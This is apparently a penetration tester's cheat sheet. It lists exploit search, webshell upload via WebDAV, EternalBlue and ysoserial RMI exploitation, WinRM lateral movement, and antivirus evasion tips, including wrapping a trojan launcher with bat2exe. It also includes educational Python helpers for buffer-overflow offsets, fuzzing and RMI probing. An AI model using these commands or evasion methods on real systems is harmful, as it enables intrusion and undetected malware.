How to find exploits
In Kali Linux:
searchsploit <SERVICE NAME>
Google:
site:exploit-db.com APP VERSION
linux-exploit-suggester.sh -k 2.6.9   (pass the target's kernel version, e.g. from uname -r)
windows-exploit-suggester.py --update   (downloads the current MS bulletin database as an .xls)
windows-exploit-suggester.py -d <mssb.xls> -i <systeminfo file>   (-i takes the saved output of systeminfo from the target; the -d database is required)
linuxprivchecker.py
NULL session
net use \\$IP\ipc$ "" "/user:"
WebDAV
cadaver http://$IP
dav:/> put webshell.aspx
(Only works if the DAV share allows PUT and the web server executes the uploaded extension; try .txt then MOVE to .aspx if PUT of script extensions is blocked.)
Compilers
To cross-compile Windows exploits on Linux:
First install the package:
apt-get install mingw-w64
Command line for C (32-bit target; put -l libraries after the source file so the linker resolves the Winsock symbols):
i686-w64-mingw32-gcc 100.c -o 100.exe -lws2_32
For 64-bit targets use the x86_64-w64-mingw32-gcc prefix instead.
Useful flags (Winsock):
gcc -l ws2_32 -l mswsock
Command line for C++ (-static so the target does not need libstdc++/libgcc DLLs):
i686-w64-mingw32-g++ main.cpp -o main.exe -static
To package a python or bat script as a Windows executable (this is bundling, not real obfuscation: the original script is easily recovered from the resulting exe):
- py2exe: converts a python program into an exe http://www.py2exe.org/
- bat2exe: converts a BAT program into an exe
Reversing in Linux
Tools:
- ltrace
- strace
- strings
- binwalk
- radare2 (open-source disassembler/debugger, the usual IDA stand-in on Linux) https://github.com/radare/radare2
- objdump
radare2
Useful commands for radare2:
is: Show symbols
iS: Show sections
ii: Show imports
iI: Binary info
ia: Show all info
i?: All commands starting with i
egg-hunter
/usr/share/metasploit-framework/tools/exploit/egghunter.rb -f python -e W00T
(-e sets the 4-byte tag; the hunter scans memory for the tag repeated twice, so prefix the real payload with W00TW00T.)
Buffer Overflow offsets:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 256
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 256 -q 773870B4
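Added example (not part of the original notes): a Python reimplementation of what pattern_create.rb and pattern_offset.rb do, so the cyclic pattern is not a black box. It builds the same "Aa0Aa1Aa2..." sequence and resolves a register value such as the one in the debugger (given as 8 hex digits, interpreted little-endian exactly like -q) back to the offset at which the saved return address was overwritten. The value 41346141 below is a constructed example, not the 773870B4 from the notes.

```python
import struct
from typing import Optional

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"


def pattern_create(length: int) -> bytes:
    """Build the Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") of LENGTH bytes.
    Three nested charsets give 26*26*10 triples = 20280 bytes before the sequence
    repeats, so every 4-byte window is unique for buffers up to that size."""
    out = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGIT:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out).encode()[:length]
    return "".join(out).encode()[:length]


def pattern_offset(length: int, query: str) -> Optional[int]:
    """Return the offset of QUERY inside the pattern of LENGTH bytes, or None.
    QUERY is either the register value as the debugger prints it (8 hex digits,
    interpreted little-endian, as pattern_offset.rb -q does) or a literal substring
    of the pattern such as "Aa4A"."""
    pat = pattern_create(length)
    if len(query) == 8 and all(c in "0123456789abcdefABCDEF" for c in query):
        # EIP/RIP holds the 4 overwritten bytes in little-endian order: reverse them
        needle = struct.pack("<I", int(query, 16))
    else:
        needle = query.encode()
    idx = pat.find(needle)
    return idx if idx != -1 else None


if __name__ == "__main__":
    print(pattern_create(256).decode())
    # Constructed crash value: EIP = 0x41346141 -> bytes "Aa4A" -> offset 12
    print(pattern_offset(256, "41346141"))
```

When the lookup returns None the crash value did not come from the pattern: either the pattern was too short, the bytes were mangled on the way in (bad characters), or the overwrite is of something other than the saved return address.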
Reversing in Windows
Tools:
- IDA Pro
- OllyDbg
- Immunity Debugger
- mona.py (Corelan): https://github.com/corelan/mona . Immunity Debugger / WinDbg plugin for exploit development: pattern offsets, bad-character checks, module protections (SafeSEH/ASLR/DEP), JMP ESP and ROP gadget search.
- API Monitor: http://www.rohitab.com/apimonitor . Free tool that lets you monitor and control API calls made by applications and services; useful for seeing how a program works or for tracking down problems in your own code.
Reversing .NET
- https://github.com/0xd4d/dnSpy .NET debugger and assembly editor (the original repository is archived; dnSpyEx is the maintained fork)
Fuzzing
Linux
- sfuzz (kali)
- radamsa
- spike
Windows
- WinAFL (https://github.com/googleprojectzero/winafl): the Windows fork of AFL, driven by DynamoRIO or hardware tracing for coverage.
AFL (american fuzzy lop) is the popular coverage-guided fuzzer the fork is based on. It combines fast target execution with instrumentation-based heuristics to find new execution paths in the target binary and has found a large number of vulnerabilities in real products.
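Added example (not code from the page or from any of the tools listed): a minimal dumb mutation fuzzer in the style of sfuzz/radamsa, to show what the tools above automate. It has no coverage feedback (what AFL/WinAFL add); it just takes seed inputs, applies a few random mutations (bit flips, byte insertion/deletion, chunk duplication), runs a target, and records the first input for every distinct exception type. The target parse_record is a constructed toy parser with a deliberate bug: it trusts the LEN field in the header.

```python
import random
from typing import Callable, Dict, List, Optional


def parse_record(data: bytes) -> bytes:
    """Constructed target. Parses "LEN=<n>;<payload>" and returns payload byte n-1.
    Trusting n without checking it against len(payload) is the bug to be found."""
    header, payload = data.split(b";", 1)        # ValueError if there is no ';'
    key, value = header.split(b"=", 1)           # ValueError if there is no '='
    if key != b"LEN":
        return b""                               # unknown header handled gracefully
    n = int(value)                               # ValueError on non-numeric length
    return bytes([payload[n - 1]])               # IndexError when n > len(payload)


# radamsa-style mutators: each takes the RNG and an input and returns a mutated copy.
def bit_flip(rng: random.Random, data: bytes) -> bytes:
    if not data:
        return data
    buf = bytearray(data)
    buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    return bytes(buf)


def insert_byte(rng: random.Random, data: bytes) -> bytes:
    i = rng.randrange(len(data) + 1)
    return data[:i] + bytes([rng.randrange(256)]) + data[i:]


def delete_byte(rng: random.Random, data: bytes) -> bytes:
    if len(data) < 2:
        return data
    i = rng.randrange(len(data))
    return data[:i] + data[i + 1:]


def duplicate_chunk(rng: random.Random, data: bytes) -> bytes:
    if not data:
        return data
    i = rng.randrange(len(data))
    j = rng.randrange(i + 1, len(data) + 1)
    return data[:j] + data[i:j] + data[j:]


MUTATORS = [bit_flip, insert_byte, delete_byte, duplicate_chunk]


def run_target(target: Callable[[bytes], object], data: bytes) -> Optional[str]:
    """Run one input. Returns the exception type name on a crash, None if it survived."""
    try:
        target(data)
        return None
    except Exception as exc:                     # any uncaught exception counts as a crash
        return type(exc).__name__


def fuzz(target: Callable[[bytes], object], seeds: List[bytes],
         iterations: int, seed: int = 0) -> Dict[str, bytes]:
    """Dumb mutation fuzzing: pick a seed, stack 1-3 random mutations, run it,
    and keep the first input that triggers each distinct exception type."""
    rng = random.Random(seed)                    # fixed seed makes a campaign reproducible
    crashes: Dict[str, bytes] = {}
    for _ in range(iterations):
        data = rng.choice(seeds)
        for _ in range(rng.randint(1, 3)):
            data = rng.choice(MUTATORS)(rng, data)
        sig = run_target(target, data)
        if sig is not None and sig not in crashes:
            crashes[sig] = data
    return crashes


if __name__ == "__main__":
    for sig, case in fuzz(parse_record, [b"LEN=5;hello"], 500, seed=1).items():
        print(f"{sig}: {case!r}")
```

With a real binary the target function becomes "write the input to a file, run the program under a timeout, look for a non-zero exit or a signal", and deduplication is done on the crashing stack rather than the exception type; the mutation loop stays the same.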
AV Evasion
- Veil: encrypts/encodes/obfuscates msfvenom-style payloads
Thanks @ReneFreingruber https://twitter.com/ReneFreingruber/status/1031140505453842432
Veil's Go payloads embed the build directory in the binary. To strip the "/var/lib/veil" strings and make reverse engineering harder, build with:
go build -gcflags=-trimpath=/var/lib/veil -asmflags=-trimpath=/var/lib/veil
(Go 1.13 and later also accept the single top-level flag "go build -trimpath", which removes all file system paths from the binary.)
Other tools:
- Obsidium (packer): https://www.obsidium.de/show/download/en
- bat2exe: https://github.com/islamadel/bat2exe/blob/master/upload/bat2exe.exe
  Put the trojan launcher in a bat script and use bat2exe to wrap it into an exe that can trojanize an exe or service. It may slip past signature-based AV, but do not assume it is fully undetectable; test against the target's AV first.
- Phantom-Evasion: https://github.com/oddcod3/Phantom-Evasion
  Interacts with msfvenom.
SMB exploitation
Eternalblue (MS17-010; the original Metasploit module targets Windows 7 and Server 2008 R2 (x64), all Service Packs):
use exploit/windows/smb/ms17_010_eternalblue
Scan the subnet for known SMB vulnerabilities (smb-vuln-ms17-010 is the Eternalblue check; unsafe=1 enables scripts that can crash the service):
nmap -sS -T4 --open -p 139,445 --script=smb-vuln-ms17-010,smb-vuln-conficker,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos --script-args=unsafe=1 $IP/24
Java RMI exploitation
Nmap will recognize it as:
XXXX/tcp open rmiregistry Java RMI
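Added example (not from the page or from nmap): a small Python probe that does the JRMI handshake nmap's version detection relies on. Per the Java RMI wire protocol, the client sends the magic "JRMI", version 2 and the StreamProtocol byte 0x4B; a real registry answers with ProtocolAck 0x4E followed by a Java UTF string and a 4-byte int, which the JDK fills with the client's address as the server sees it and port 0 (useful to learn how the target sees you through a NAT or proxy). The parser is exercised offline on a constructed reply; probe() is what you would run against $IP.

```python
import socket
import struct
from typing import Optional, Tuple

MAGIC = b"JRMI"            # 0x4a524d49
VERSION = 2
STREAM_PROTOCOL = 0x4B     # other choices: 0x4C SingleOp, 0x4D Multiplex
PROTOCOL_ACK = 0x4E
PROTOCOL_NACK = 0x4F


def build_handshake() -> bytes:
    """Client hello: magic, big-endian version, protocol byte."""
    return MAGIC + struct.pack(">HB", VERSION, STREAM_PROTOCOL)


def parse_ack(data: bytes) -> Optional[Tuple[str, int]]:
    """Parse a ProtocolAck reply: 0x4E, then a Java UTF string (u16 length + bytes)
    and a 4-byte port. Returns (host, port), or None for a NACK / non-RMI reply."""
    if len(data) < 7 or data[0] != PROTOCOL_ACK:
        return None
    (n,) = struct.unpack(">H", data[1:3])
    if len(data) < 3 + n + 4:
        return None
    host = data[3:3 + n].decode("utf-8", "replace")
    (port,) = struct.unpack(">I", data[3 + n:7 + n])
    return host, port


def probe(host: str, port: int = 1099, timeout: float = 5.0) -> Optional[Tuple[str, int]]:
    """Connect, send the handshake and parse the reply. None means 'not Java RMI'
    (or a NACK); a tuple means the port speaks RMI and shows how the server sees us."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_handshake())
        return parse_ack(s.recv(1024))


if __name__ == "__main__":
    import sys
    # usage: python3 rmi_probe.py <ip> [port]  (hypothetical file name)
    target = sys.argv[1]
    tport = int(sys.argv[2]) if len(sys.argv) > 2 else 1099
    print(probe(target, tport))
```

A successful ack only proves the transport is RMI; to list bound names the way rmi-dumpregistry does, the client must then send its own endpoint (UTF host + int port) and issue a Call (0x50) to the registry's list() method, which is what the nmap script and ysoserial implement.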
Exploiting RMI
With nmap:
nmap --script=rmi-vuln-classloader -p 1099 $IP
nmap --script=rmi-dumpregistry -p 1099 $IP
With metasploit:
use exploit/multi/misc/java_rmi_server
With ysoserial:
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit $IP 1099 CommonsCollections1 calc.exe
(The exploit classes live in the ysoserial.exploit package; the port is the registry port, 1099 by default. The gadget chain must match a library actually on the server's classpath.)
With the Java monitoring and performance console (JMX over RMI; shows OS performance data and application parameters, and lets you invoke exposed MBean operations if the endpoint is unauthenticated):
jconsole $IP:$PORT
WinRM exploitation
Commands:
winrs -r:$HOST $CMD   (run a command on the remote host over WinRM; add -u:$USER -p:$PASS for explicit credentials)
Test-WSMan -ComputerName $HOST   (PowerShell; checks that the WinRM listener answers, TCP 5985 for HTTP and 5986 for HTTPS)
More info about WinRM lateral movement: https://www.hackingarticles.in/winrm-penetration-testing/